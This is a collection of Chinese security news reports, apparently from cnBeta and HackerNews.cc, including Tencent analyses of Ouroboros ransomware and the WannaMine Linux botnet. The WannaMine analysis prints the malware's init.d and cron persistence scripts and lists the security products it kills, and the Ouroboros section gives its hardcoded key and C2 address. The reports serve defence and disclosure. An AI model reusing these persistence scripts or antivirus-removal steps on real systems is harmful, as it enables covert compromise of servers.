据外媒报道，黑客攻击了人气网络漫画网站XKCD的论坛并从中窃取了约56万个用户名、电子邮件和IP地址以及散列密码。XKCD在周末公开了这次攻击，此前，负责数据漏洞通知网站Have I Been Pwned维护工作的安全研究员Troy Hunt向该网站发出了警告。现在，这个论坛已经下线。 论坛方面表示，等到他们能够检查漏洞并确保论坛已经安全之后才会重新上线这个论坛。“如果你是echochamber.me/xkcd用户，那么你应当立即更改你使用了同一个或类似密码的另一个账号的密码。” XKCD是Randall Munroe创作的流行网络漫画，其已经有14年的历史、主要关注科技、科学和互联网文化。Munroe还以其现在的标志性简笔人物画风格出过几本书，包括《How To》、 《Thing Explainer》、《What If》。 Hunt表示，这些数据由白帽子公安全研究员Adam Davies发现。   （稿源：cnBeta，封面源自网络。）

感谢腾讯御见威胁情报中心来稿！ 原文： https://mp.weixin.qq.com/s/A3JYdC0dNze29v2W0xe1RA   一、概述 腾讯安全御见威胁情报中心通过蜜罐系统监测到Ouroboros勒索病毒在国内有部分传播，监测数据表明，已有湖北、山东等地的医疗、电力系统的电脑遭遇该勒索病毒攻击。经分析发现，该病毒的破坏仅在部分有限的情况可解密恢复，但在病毒按预期运行，基础设施完善情况下，暂无法解密。 Ouroboros勒索病毒首次出现于2019年8月中旬，目前发现其主要通过垃圾邮件渠道传播，由于其PDB路径中包含Ouroboros故因此得名，该病毒加密文件后会添加.Lazarus扩展后缀。 腾讯安全提醒各政企机构提高警惕，避免打开来历不明的邮件，腾讯电脑管家或腾讯御点终端安全管理系统可以查杀该病毒。 Ouroboros勒索病毒受害者的求助贴 Ouroboros勒索病毒的主要特点： 1.病毒会删除硬盘卷影副本； 2.部分样本会禁用任务管理器； 3.病毒加密前会结束若干个数据库软件的进程，加密文件时会避免加密Windows,eScan等文件夹； 4.个别情况下，该病毒的加密可以解密。在病毒按预期运行，基础设施完善情况下，暂无法解密； 5.攻击者弹出勒索消息，要求受害者通过电子邮件联系后完成交易。 二、分析 Ouroboros勒索病毒通常使用外壳程序来进行伪装，通过内存可Dump出勒索payload 查看勒索payload可知其PDB，根据PDB文件名，将该病毒命名为Ouroboros勒索病毒。 病毒运行后首先使用PowerShell命令行删除卷影 部分样本还会同时禁用任务管理器 首先获取本机的IP，磁盘信息，随机生成的文件加密Key信息，使用的邮箱信息进行上报 获取本机IP服务接口：hxxp://www.sfml-dev.org/ip-provider.php 病毒接收请求服务器IP：176.31.68.30   随后对服务器返回结果进行判断是否正常，当服务接口失活情况则拷贝一个硬编码密钥NC1uv734hfl8948hflgGcMaKLyWTx9H进行备用 加密前结束数据库相关进程列表： sqlserver.exe msftesql.exe sqlagent.exe sqlbrowser.exe sqlwriter.exe mysqld.exe mysqld-nt.exe mysqld-opt.exe 加密时避开以下关键词目录和文件： Windows eScan !Qhlogs Info.txt   硬编码的加密IV:1096644664328666 使用硬编码密钥KEY:NC1uv734hfl8948hflgGcMaKLyWTx9H进行AES文件加密   加密后如果为大文件则向后移动文件指针0xDBBA0处继续加密0x15F90字节大小内容   文件被加密为原始文件名.[ID=random][Mail=勒索邮箱号].Lazarus   例如如下图中“安装说明.txt”文件被加密为“安装说明.txt.[ID=40BjcX1Eb2][Mail=unlockme123@protonmail.com].Lazarus”   由于当前分析病毒版本接口未返回有效信息，病毒使用离线密钥进行加密，所以可以尝试对文件进行解密，编写测试demo可将上述“安装说明.txt”成功解密出原始内容。但由于在该病毒基础设施完善情况下，病毒攻击过程中使密钥获取困难，故该病毒的解密不容乐观。   病毒同时会留下名为Read-Me-Now.txt的勒索说明文档，要求联系指定邮箱购买解密工具     同时在ProgramData目录释放执行uiapp.exe弹出勒索说明窗口进一步提示勒索信息。   三、安全建议 企业用户： 针对该病毒的重点防御方案： 1.针对该勒索病毒主要通过电子邮件传播的特点，建议企业对员工加强安全意识教育，避免点击下载邮件附件。使用MS Office的用户，应尽量避免启用宏功能，除非该文档来源可靠可信。 2.使用腾讯御点终端安全管理系统或腾讯电脑管家拦截病毒，并启用文档守护者功能备份重要文档。 3.企业用户可以使用腾讯御界高级威胁检测系统，御界系统发现可疑邮件，并将可疑邮件的附件通过沙箱分析。在本案例中，御界系统的沙箱功能，分析出危险附件具有可疑的加密敲诈行为。 通用的安全措施： 1.企业内网可以关闭不必要的网络端口，降低黑客在内网攻击传播的成功率。如：445、135，139等，对3389，5900等端口可进行白名单配置，只允许白名单内的IP连接登陆。 2、尽量关闭不必要的文件共享，如有需要，请使用ACL和强密码保护来限制访问权限，禁用对共享文件夹的匿名访问。 3、采用高强度的密码，避免使用弱口令密码，并定期更换密码。建议服务器密码使用高强度且无规律密码，并且强制要求每个服务器使用不同密码管理。 4、对没有互联需求的服务器/工作站内部访问设置相应控制，避免可连外网服务器被攻击后作为跳板进一步攻击其他服务器。 5、对重要文件和数据（数据库等数据）进行定期非本地备份。 6、在终端/服务器部署专业安全防护软件，Web服务器可考虑部署在腾讯云等具备专业安全防护能力的云服务。   7、建议全网安装御点终端安全管理系统（https://s.tencent.com/product/yd/index.html）。御点终端安全管理系统具备终端杀毒统一管控、修复漏洞统一管控，以及策略管控等全方位的安全管理功能，可帮助企业管理者全面了解、管理企业内网安全状况、保护企业安全。 个人用户： 1、启用腾讯电脑管家，勿随意打开陌生邮件，关闭Office执行宏代码。 2、打开电脑管家的文档守护者功能，利用磁盘冗余空间自动备份数据文档，即使发生意外，数据也可有备无患。 IOCs MD5: 87283fcc4ac3fce09faccb75e945364c e17c681354771b875301fa30396b0835 感染信息上报IP： 176.31.68.30 勒索邮箱： Helpcrypt1@tutanota.com unlockme123@protonmail.com dadacrc@protonmail.ch Steven77xx@protonmail.com 离线情况AES密钥： KEY:NC1uv734hfl8948hflgGcMaKLyWTx9H IV:1096644664328666

据外媒报道，谷歌本周披露的针对苹果iPhone的空前攻击比人们最初想象的要广泛。据匿名知情人士透露，谷歌和微软操作系统受到的网络公司也是来源于对iPhone发起网络攻击的同一家网站。 Android和Windows系统成为攻击目标表明了这个为期两年的黑客攻击行动不仅针对苹果手机还感染了比最初怀疑的更多的设备。现在，Android和Windows仍旧是世界上使用最广泛的操作系统，无论是哪种黑客攻击，它们都极具吸引力。 目前还不清楚谷歌是否知道或披露了这些网站也在针对其他操作系统。一位熟悉攻击的消息人士则指出，谷歌只看到这些网站利用了iOS系统。对此，苹果尚未发表任何声明也没有对最新进展发表评论。 而据一位跟谷歌关系密切的消息人士透露，谷歌告诉了苹果哪些网站在2月份受到了攻击。谷歌的研究人员则是在8月29日披露了这些攻击。 目前还不清楚究竟Android和Windows究竟哪些漏洞被那些被用来攻击苹果操作系统的漏洞所利用。如果是在iOS遭攻击的情况下，攻击者会利用这些漏洞在手机上植入恶意软件并可能监视大量数据，其中包括加密的WhatsApp、iMessage和Telegram以及实时位置。   （稿源：cnBeta，封面源自网络。）

据外媒Techspot报道，一个黑客组织本周设法渗透到美国数百家牙科诊所办公室的网络中，并用勒索软件加载他们的系统。正如Krebs on Security所强调的那样，PerCSoft是一家位于威斯康星州的数字牙科记录云管理提供商，该公司运营著名的DDS Safe在线数据备份服务。该服务为全国数百家牙科诊所提供牙科记录、图表、保险信息等。 黑客们使用Evil (Sodinokibi) 勒索软件攻击PerCSof，锁定约400牙科诊所的文件。多个消息来源报告说，PerCSoft支付了赎金，并获得了一个解密密钥，其正在积极地分发给受影响的牙科诊所，以帮助他们恢复他们的文件。 Krebs表示，目前尚不清楚PerCSoft是否直接支付了赎金，或者资金是否由保险公司提供。向付费受害者提供解密密钥符合黑客的最佳利益。如果他们声称不提供钥匙，那么人们就会放弃支付赎金，并且没有经济激励黑客继续这样做。 根据ProPublica的说法，提交保险索赔和支付免赔额通常比赎金赎金的全部成本要便宜得多。不幸的是，这鼓励黑客专门针对那些他们知道拥有网络保险的公司。   （稿源：cnBeta，封面源自网络。）

援引福布斯报道，来自Sophos的网络安全专家近期发现了新型网络攻击方式。虽然要比以往攻击方式更加复杂，但可使用双因素（2FA）来获取受害者的账号信息。研究人员警告称，黑客使用伪造的2FA页面让用户相信有未经授权的登录行为，并要求用户登陆来确认他们的身份。 这些电子邮件所描述的内容自然是假的，但可怕的是这些页面和实际的Instagram登录页面非常相似。Sophos团队表示：“尽管我们不愿意承认，但黑客在伪造技术上是一流的。而且还采用了更令人信服的SSL连接。”黑客获得了该网站的SSL证书，该证书添加了HTTPS和绿色挂锁，以确保用户认为是在访问真正的Instagram网站。 Sophos团队还为用户发布了一条很棒的建议。如果您收到需要访问社交媒体的电子邮件，请不要按照电子邮件中的链接进行操作。相反，请正常登录网站，然后按照电子邮件中的步骤解决问题。这将确保您不会意外地将您的凭据放入钓鱼网站。 此外Sophos团队还建议用户不要只看是否有绿色挂锁，因为黑客非常容易得到。用户应该注意域名信息，Facebook和Instagram等大多数公司都使用顶级域名（.com）。这可以帮助您识别网络钓鱼网站，因为它将使用不同的域。例如，黑客在这里使用的是“.cf”，这是一个分配给中非共和国注册的域名。     （稿源：cnBeta，封面源自网络。）

每个人都可能经历过账号被盗、个人隐私被窃取等伤害，成为网络攻击、恶意软件、勒索软件的受害者。在对基于互联网犯罪投诉中心的FBI年度报告进行分析之后，CenturyLinkQuote绘制了2018年美国每个州的网络受害者数量和损失金额程度。 根据地图显示，阿拉斯加州成为网络受害者数量最多的州，在每1万名居民中就有21.67位网络受害者，而且每位受害者的损失金额高达2256.30美元，使其连续第二年成为受害最严重的州。而网络受害者数量最少的州今年依然是南卡罗来纳州，每万人受害者数量仅为5.3人，整个州全年的网络损失为1.37亿美元。 尽管南卡罗来纳州的总损失已经很高了，但是美国加利福尼亚州总损失金额最大。在2018年美国加州因网络诈骗、恶意软件等网络攻击损失了4.5亿美元，平均每位受害者损失9178.70美元。纽约州以2.07亿美元位居第二，平均每位受害者损失11426.29美元。 在受害方式方面，社交网络是2018年比较流行的攻击方式，41000名受害者因此造成1.01亿美元的损失。而虚拟货币骗局让36000名受害者损失了1.82亿美元。不出所料，60岁以上的人是诈骗者最具针对性的年龄组。他们在2018年失去了6.5亿美元的计划，包括信任/关系欺诈。   （稿源：cnBeta，封面源自网络。）

感谢腾讯御见威胁情报中心来稿！ 原文：WannaMine挖矿木马再活跃，14万台linux系统受攻击，广东省为重灾区   一、背景 腾讯安全专家在为某企业客户进行例行安全巡检过程中，发现客户部署的腾讯御界高级威胁检测系统出现了SSH服务失陷感知信息。 在征得客户同意后对客户机器进行远程取证，并结合御界的关键日志进行分析，我们发现这是一起针对SSH服务器弱口令爆破攻击事件，由于发现及时，工程师及时协助客户进行隔离及杀毒，并未造成损失。 腾讯安全御见威胁情报中心展开事件调查，结果发现，这是由大型挖矿僵尸网络WannaMine发起的攻击事件：攻击者利用SSH弱口令爆破成功后会植入shell后门以及brootkit后门程序，并通过SSH在内网横向传播，受害机器接收远程指令安装（包括但不限于）挖矿木马、DDoS攻击模块。 SSH代表安全外壳(Secure Shell)，它现在是通过互联网访问网络设备和服务器的主要协议之一。SSH主要用在所有流行的操作系统上，比如Unix、Solaris、Red-Hat Linux、CentOS和Ubuntu等。SSH默认情况使用端口号22，我们通过zoomeye查找开放22端口的设备，发现全球有超过1亿台设备开放了该端口，这意味着超过1亿台设备有被爆破攻击的可能。(参考链接：https://www.zoomeye.org/searchResult?q=port%3A22) 根据腾讯安全御见威胁情报中心的监测数据，WannaMine自2019年6月开始在国内呈现新的快速增长趋势，目前已影响近14万台设备。 病毒感染地区分布前三名分别为：广东（20.3%）、江苏（7.7%）、浙江（7%）。 WannaMine病毒受害者分布 受WannaMine病毒影响的主要行业为工业企业（34.11%），其次为互联网企业（10.85%）和教育行业（10.08%）。 WannaMine挖矿木马影响的主要行业 二、详细分析 分析发现，此次攻击事件中WannaMine开始将攻击目标转向Linux系统，其行为主要具有以下特点： 1、会获取被感染机器的SSH连接记录，从而攻击该机器登录过的所有远程服务器，以达到横向传播的目的； 2、检测中招机器上的“安全狗”、“安骑士”、“云锁”、“悬镜卫士”等12种服务器防护软件，针对每一款软件进行退出及删除； 3、将守护脚本代码添加至Linux启动项、定时任务，以达到持久化；最后清除挖矿竞争对手，开启挖矿，并尝试利用Linux内核提权漏洞CVE-2016-5195获取系统Root权限； 4、植入Linux平台DDoS木马“BillGates”，该木马伪装成Linux系统工具“ps”，“lsof”和”netstat”等进行隐藏，具有远程shell、作为客户端或服务器运行的功能。“BillGates”接收远程指令，对目标进行多种类型的DDoS攻击。 WannaMine攻击Linux系统 Shell 在通过漏洞攻击、爆破攻击进入Linux系统后,病毒植入“Shell”脚本。脚本首先进行变量声明，指定后续需要用到的网络地址，文件路径等信息。 指定木马远程地址和目录、以及文件hash: temp_remote_host: 远程地址 sodd_info_arr: DDoS木马 tiktoor_info_arr: brootkit后门 pxe_info_arr: CVE-2016-5195内核提权 指定木马执行路径、进程名及相关参数： 下载文件保存目录：DownloadPath=”/usr/lib/…” Shell进程名：ShellProceName=”diskmanagerd” DDoS木马进程名：soddProceName=”kacpi_notify” Shell进程权限：shell_privilege=1 系统类型：OsType=1 校验方法：verify_method=”md5sum” Shell参数：ShellArg=$1 当前版本：Ver=1.0 对抗杀软 通过ls -l /etc/init.d/$servicename检测以下防护服务： Safedog：安全狗 aegis：安骑士 yunsuo：云锁 clamd：ClamAV avast：Avast avgd：AVG cmdavd：COMODO Antivirus cmdmgd：COMODO Antivirus drweb-configd：Dr.Web drweb-spider-kmod：Dr.Web esets：ESET NOD32 Antivirus xmirrord：悬镜服务器卫士 然后针对每一款防护软件进行清理，包括停止服务、杀死进程、删除文件、卸载软件等操作。 function BasicInit(){}执行基础的初始化。 使用ping命令检查remote_host中的第一个地址是否能连接，如果不能则使用第二个； 通过查看$UID、$EUID的值来确定当前的权限，高权限则设置下载目录为”/home/$USER/…”，低权限设置为”/usr/lib/…”； 检查当前是否具有md5校验功能；检查当前系统属于CentOS/Ubantu/Debian中的哪一种，默认为CentOS。 内核提权 function RunInBack(){}检查shell是否使用/sbin/init运行，如果不是则将脚本移动到以前具有写入权限(Rwx)的文件夹，其名称为“diskmanagerd”(名称在$ShellProceName名称变量中指定)，然后将脚本尝试使用nohup实用程序重新运行，或在未安装nohup时仅在后台运行。 function GetRootAccess(){}利用漏洞CVE-2016-5195获取系统Root权限。 参考链接：https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails CVE-2016-5195（脏牛漏洞）是因为Linux内核的内存子系统在处理写入时复制（copy-on-write, COW）时产生了竞争条件（race condition），攻击者利用此漏洞对只读内存映射进行写访问，从而可获得Linux设备的root权限。 清除挖矿竞品 function WorkProc(){}检测并结束挖矿相关的进程。 持久化攻击 function SetStartup(){}中分别添加守护程序到Linux启动项目录、定时任务，以达到反复执行shell的目的。 守护脚本1： guarderText=”#!/bin/sh # chkconfig: 12345 90 90 # description: irqbalence ### BEGIN INIT INFO # Provides:     irqbalence # Required-Start: # Required-Stop: # Default-Start:    1 2 3 4 5 # Default-Stop: # Short-Description:    irqbalence ### END INIT INFO case \$1 in start)     /usr/bin/irqbalence     ;; stop)     ;; *)     /usr/bin/irqbalence     ;; esac” 将guarderText内容写入启动目录/etc/rc.d/init.d目录下，从而在启动时执行。 守护脚本2： guarderText2=”#!/bin/sh PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin for i in \`cat /proc/net/dev|grep :|awk -F: {‘print \$1’}\`; do ifconfig \$i up& done if [ ! -f \”$DownloadPath/$ShellProceName\” ]; then     \cp -rf /lib/libterminfo.so $DownloadPath/httpdinfo fi test=0 for i in /proc/* do     if [ -d \”\$i\” ] && [ \”\$i\” != \”/proc/\$\$\” ];then         if [ -f \”\$i/exe\” ]; then             temp=\`ls -l \$i | grep exe | grep /bin/bash\`             if [ \”\$temp\” != \”\” ]; then                 temp=\`cat \$i/cmdline\`                 result=\$(echo \”\$temp\” | grep \”$ShellProceName\”)                 if [ \”\$result\” != \”\” ]; then                     test=1                     break                 fi             fi         fi     fi done if [ \”\$test\” = 0 ]; then     (exec $DownloadPath/httpdinfo &> /dev/null &) fi” 将guarderText2写入etc/cron.hourly/gcc4lef.sh，并安装为crontab定时任务运行 brootkit后门 function rootkit(){}安装brootkit后门(github: https://github.com/cloudsec/brootkit)，该后门具有具有盗取root用户密码、隐藏文件和目录、隐藏进程、隐藏网络连接、反连后门、多线程端口扫描、HTTP下载、多线程SSH爆破等功能。 横向移动 function Dandelion(){}从各种来源（用户历史记录）收集有关当前用户之前通过SSH连接的所有远程服务器信息，尝试连接到这些主机并感染它们，以便将自身传播到更多的系统。 DDoS木马 function CheckUpdate(){}检查木马最新版本，并从服务器下载更新 function Guard(){}中下载DDoS病毒”BillGates”。 依次使用4中下载方法尝试下载(“wget” “curl” “python” “tcp”)。 下载完成后后使用md5sum计算文件md5并进行校验，验证md5值是否为6a971a24a418ce99e9a0cd65ba14078d/4e117357b8a5bf51aaba6e939cace26b。 BillGates（作者疑似比尔盖兹的粉丝） shell下载的文件为功能复杂DDoS木马BillGates，其得名于其在变量函数的命名中，大量使用“Gates”和“Bill”。此外，木马还具有伪装成Linux系统工具’ps’，’lsof’和’netstat’等进行隐藏自身、远程shell、作为客户端或服务器运行等特点。 木马早期大规模扫描和利用漏洞感染Elasticsearch服务器（ElasticSearch是一个基于Lucene的搜索服务器，是最受欢迎的企业搜索引擎）从而组成强大的僵尸网络。 木马首先建立一个包含文件名和路径的全局变量“监视”文件。监视文件代表初步安装的BillGates处于运行状态下。接下来通过CSysTool::CheckGatesType来确定当前处于哪种运行状态下，判断返回的全局变量g_iGatesType标识0至3共四种状态： 0代表当前进程的映像符合监控文件名和路径 1代表当前进程的映像不符合监控文件名和路径，并且不属于其他任何类型 2代表当前进程的映像符合/usr/bin/ 3代表当前进程的映像符合下列系统工具之一 /bin/netstat /bin/lsof /bin/ps /bin/ss /usr/bin/netstat /usr/bin/lsof /usr/bin/ps /usr/bin/ss /usr/sbin/netstat /usr/sbin/lsof /usr/sbin/ps /usr/sbin/ss 匹配到每个标识后都以不同的目的运行，这样使得BillGates作为单个实体可以运作四种不同的模式，执行多个独特的功能，从而其成为一个复杂的的多功能木马。 模式0 BillGates作为感染监控器，通过调用MainMonitor开始。在这种模式下的任务是不断监视活动进程列表以确定是否生成了由模式1（称为Host模式）产生的进程正在运行。 模式1 BillGates的Host模式。当main函数中调用MainBeikong开始执行。Host模式的初始化阶段完成后，MainBeikong通过调用MainProcess结束，MainProcess是BillGates在Host或Backdoor模式下运行时的核心功能。MainProcess首先初始化五个全局对象： Host或backdoor模式下的BillGates支持7种不同的管理控制命令： 其中DDoS攻击类型如下： 模式2 Backdoor模式。main函数中调用MainBackdoor进入该模式。使用BillGates文件替换Linux系统二进制文件，然后MainBackdoor调用MainProcess，在这之后执行代码与Host模式的行为相同。 模式3 公共设施。该模式通过调用MainSystool 开始，BillGates作为Linux系统二进制文件的代理运行，并从系统工具的输出中删除自己的痕迹。 三、总结 WannaMine攻击代码呈现高度系统化、定制化的特点，从首次出现之后，其载荷托管IP地址会在没一次重要更新之后进行切换。而观察历史托管IP与IP解析到的域名可以发现，跨时期、跨版本的攻击代码又存在使用相同的托管域名(标红域名)的情况，因此推测该病毒团伙存在在向其他团伙提供攻击武器的可能。 从攻击对象与手法上来看，WannaMine不断拓宽其攻击覆盖面，从最初的利用“永恒之蓝”漏洞、Powershell攻击Windows系统，到后来利用各类Web漏洞(Weblogic、PHPMyAdmin、Drupal)攻击Windows上搭建的服务器，到最后通过MsSQL爆破攻击SQL服务器，以及SSH爆破攻击Linux服务器。 在木马类型上，开始以植入挖矿和远控类型木马为主，后来逐渐加入DDoS木马(包括Windows平台和Linux平台)，其目标在于组建庞大的挖矿僵尸网络以及DDoS僵尸网络，使该病毒团伙具有不断更新、内网横向移动、持久化获利的能力。 四、安全建议 1、及时为系统和应用软件打补丁，关闭不必要的端口和服务； 2、使用高强度的系统登陆密码、SSH登陆密码、MsSQL数据库密码等； 3、安装安全软件并保持安全软件正常开启，本案例说明，Linux系统被病毒入侵的事件越来越常见； 4、Linux服务器手动清理方案 删除启动项 /etc/rc.d/init.d/diskmanagerd /etc/rcS.d/S90diskmanagerd 删除定时任务 */3 * * * * root /etc/cron.hourly/gcc4lef.sh 删除文件 /tmp/…/brootkit.sh /tmp/…/install.sh /tmp/…/just4root /tmp/…/pxe 关闭进程 /usr/lib/diskmanagerd /home/$USER/diskmanagerd /usr/lib/kacpi_notify /home/$USER/kacpi_notify 5、修复漏洞(Dirty COW:CVE-2016-5195) 各操作系统供应商下载Linux kernel 4.8.3、Linux kernel 4.7.9和Linux kernel 4.4.26 LTS，为用户提供稳定版渠道更新。 软件开发人员可以通过 https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=19be0eaffa3ac7d8eb6784ad9bdbc7d67ed8e619 重新编译Linux修复此漏洞。 6、ssh非交互方式登录到远程服务器时，设置主机公钥确认StrictHostKeyChecking的值为ask或yes，避免历史SSH登录记录被病毒利用，形成内网扩散。 （注：StrictHostKeyChecking=no 最不安全的级别,连接server的key在本地不存在，就自动添加到文件中（默认是known_hosts）。 StrictHostKeyChecking=ask 默认的级别,如果连接和key不匹配，给出提示，并拒绝登录。 StrictHostKeyChecking=yes最安全的级别，如果连接与key不匹配，就拒绝连接，不会提示详细信息。） 7、使用腾讯御界高级威胁检测系统检测未知黑客的各种可疑攻击行为。御界高级威胁检测系统，是基于腾讯反病毒实验室的安全能力、依托腾讯在云和端的海量数据，研发出的独特威胁情报和恶意检测模型系统。 IOCs IP 195.22.127.157 107.179.67.243 45.63.55.15 94.102.52.36 123.59.68.172 93.174.93.73 121.17.28.15 195.22.127.93 198.54.117.244 107.148.195.71 185.128.40.102 185.128.43.62 192.74.245.97 87.121.98.215 172.247.116.8 172.247.116.87 45.199.154.108 111.90.140.35 185.234.218.40 185.128.41.90 Domain node3.jhshxbv.com node.jhshxbv.com node4.jhshxbv.com node2.jhshxbv.com stafftest.spdns.eu profetestruec.net nuki-dx.com ddd.parkmap.org yp.parkmap.org demaxiya.info、 fashionbookmark.com www.windowsdefenderhost.club update.windowsdefenderhost.club d4uk.7h4uk.com update.7h4uk.com info.7h4uk.com oa.to0ls.com mail.to0ls.com auth.to0ls.com MD5 1db902385b4480a76e4527605eb9f825（Shell） 6a971a24a418ce99e9a0cd65ba14078d（BillGates） 4e117357b8a5bf51aaba6e939cace26b（BillGates） c04dceb4c769b2c8823cbf39f3055e6d（Brootkit） ad593f6a17598bdd12fd3bd0f3b2a925（Brootkit） 20788d837f33f5e735bdc99d68fc71b1（Dirtycow） d9bbb758e3831839558d80f381f9d4b1（Dirtycow） 795acc900cb55882629e7ce3f65130c4（Dirtycow） 1195ea4886acf3a857913c448af78d11（Dirtycow） 参考资料： https://www.freebuf.com/articles/web/175626.html https://mp.weixin.qq.com/s/U3sODZCmCPIfFqjQgHpa0A https://zhuanlan.zhihu.com/p/68612894 https://www.novetta.com/wp-content/uploads/2015/06/NTRG_ElasticBotnetReport_06102015.pdf https://www.akamai.com/us/en/multimedia/documents/state-of-the-internet/bill-gates-botnet-threat-advisory.pdf  

RubyGems 工作人员表示，他们已经移除了 18 个包含后门机制的恶意版本 Ruby 库。自 7 月 8 日以来，其已被下载 3584 次。如剔除同一库的不同版本，则有 11 个 Ruby 库被污染。这些 Ruby 库被软件包存储库的恶意维护者破解并植入了后门代码，可在其他人启用的 Ruby 项目中开展隐匿的加密货币挖掘任务。 （图自：GitHub，via ZDNet） 昨天，人们在四个版本的 rest-client 中首次发现。作为一个相当流行的 Ruby 库，荷兰开发人者 Jan DIntel分析称： 恶意代码会收集受感染系统的 URL 和环境变量，并将之发送到位于乌克兰的远程服务器。 根据用户的设置，这可能包括当前使用的服务凭证，数据库和支付服务提供商都该倍加小心。 此外，代码包含了一个后门机制，允许攻击者将 cookie 文件发送回受感染的项目中，并执行恶意命令。 RubyGems 工作人员在后续的一次调查中发现，这种机制被滥用并植入了加密货币的挖矿代码，然后又在另外 10 个项目中发现了类似的代码。 据悉，除了 rest-clint 之外的所有库，都调用了另一个功能齐全的库来添加恶意代码，然后以新名称在 RubyGems 重新上传以实现创建。 受影响的 11 个库名如下（具体版本号请移步至官网公告查看 / GitHub 传送门）： rest-clint、bitcoin_canity、lita_coin、coming-soon、omniauth_amazon、cron_parser、coin_base、blockchain_wallet、awesome-bot、doge-coin、以及 capistrano-colors 。 遗憾的是，这个隐匿的计划已经活跃了一个多月，结果期间一直未被他人发现。 直到黑客设法访问其中一位客户端开发人员的 RubyGems 账户时，人们才惊觉其在 RubyGems 上推送了四个恶意版本的 rest-clint 。 最终，在所有 18 个恶意库版本被 RubyGems 删除之前，其已经累积了 3584 次下载。 在此，官方建议在关系树中对这些库有依赖的项目开发者，务必采取相应的升级或降级措施，以用上相对安全的版本。   （稿源：cnBeta，封面源自网络。）

据外媒Gizmodo报道，当地时间上周五早上，德克萨斯州的近20家州政府机构报告称存在重大计算机问题。该州现在认为，导致这次严重攻击事件的罪魁祸首是同一个黑客。德克萨斯州信息资源部（DIR）周五在一份新闻稿中说，其正在监督该州数个州政府机构对“协调勒索软件攻击”的反应。截至周六，DIR知道有23个受攻击影响的机构，该部门认为这可能是由“单一威胁行为者”执行的。 DIR表示正在与许多组织合作，将系统重新上线，包括州紧急事务管理部、军事部和公用事业委员会，以及联邦调查局的网络部门和联邦紧急事务管理部门。 “目前，DIR、德克萨斯军事部和德克萨斯A＆M大学系统的网络响应和安全运营中心团队正在为受影响最严重的司法管辖区部署资源，”DIR在一份声明中说。 DIR并没有具体说明哪些机构在袭击中受到影响。“在这个时候，我们尚未列出受影响的实体，以免使其成为其他潜在坏人的目标，”DIR发言人在一封电子邮件中说。 这一事件只是最近针对美国市政当局和州政府机构的多起勒索软件攻击中的最新事件。今年6月，佛罗里达州里维埃拉海滩市议会投票决定支付超过60万美元给一个勒索软件团伙,以恢复被锁定和加密的数据。几天后，佛罗里达州的Lake City 向袭击该城市网络的黑客支付了价值46万美元的比特币赎金。 今年5月，属于巴尔的摩市政府的大约10000台计算机感染了RobbinHood勒索软件，这次攻击预计将使该市损失数千万美元。去年，亚特兰大市遭受SamSam勒索软件攻击，两名伊朗黑客被起诉。 正如Next Web在报道德克萨斯州攻击事件时指出的那样，网络安全公司Malwarebytes最近的一份报告显示，该公司已经看到针对普通消费者的恶意软件攻击正在减少，而针对政府机构和企业的攻击却在增加。根据调查结果，2019年第二季度针对企业的勒索软件检测增加了363％。   （稿源：cnBeta，封面源自网络。）

黑客们曾经通过破坏和滥用免费多媒体编辑网站 VSDC 散播 Win32.Bolik.2 银行木马，但现在他们改变了攻击策略。 黑客之前的做法是黑入正规网站，并将恶意软件捆绑在下载链接中。但现在黑客使用网站克隆，将银行木马散播到毫无防备的受害者的计算机上。 这使他们可以专注于为恶意工具添加功能，而无需再为渗透企业的服务器和网站而浪费时间。 更重要的是，他们创建的 nord-vpn.club 网站几乎完美克隆了流行的VPN 服务 NordVPN 的官方网站 nordvpn.com，这使得他们可以大范围传播 Win32.Bolik.2 银行木马。   成千上万的潜在受害者 克隆的网站还拥有由开放证书颁发机构 Let’s Encrypt 于 8 月 3 日颁发的有效 SSL 证书，有效期为 11 月 1 日。 Doctor Web 研究人员称：“Win32.Bolik.2 木马是 Win32.Bolik.1 的改进版本，具有多组分多态文件病毒的特性，” 。 “使用这种恶意软件，黑客可以进行网络注入、流量拦截，键盘记录和窃取多个 bank-client 系统的信息。” 这个恶意活动已于 8 月 8 日发起，他们主要攻击使用英语的网民，据研究人员称，已经有数千人为了下载 NordVPN 客户端而访问了 nord-vpn.club 网站。 制造 Bolik 蠕虫的黑客又回来了。他通过伪造 NordVPN，Invoicesoftware360 和 Clipoffice 等网站传播恶意软件 。 Arcticle：https://t.co/1ZJK5BdV4F  IOCs：https://t.co/Q9b9ECrZxu – Ivan Korolev（@ fe7ch）2019年8月19日 恶意软件分析师 Ivan Korolev 称，在感染用户的计算机之后，黑客使用恶意软件“主要用于网络注入/流量监控器/后门”。   通过克隆网站传播恶意软件 Win32.Bolik.2 和 Trojan.PWS.Stealer.26645 也是由同一个黑客组织于 2019 年 6 月下旬通过下面这两个虚假网站传播出去的： •invoicesoftware360.xyz（原为 invoicesoftware360. com） •clipoffice.xyz（原为 crystaloffice.com） 早在四月，免费多媒体编辑网站 VSDC 就遭遇了黑客攻击，这实际上是两年来的第二起事件。下载链接被用来散播 Win32.Bolik.2 银行木马和Trojan.PWS.Stealer（ KPOT stealer）。 下载并安装受感染的 VSDC 安装程序的用户的计算机可能会被使用多组件多态的木马感染，病毒还有可能从浏览器，他们的Microsoft帐户，各种聊天应用程序等程序中窃取了敏感信息。   消息来源：BleepingComputer， 译者：r4938n，校审：吴烦恼 本文由 HackerNews.cc 翻译整理，封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接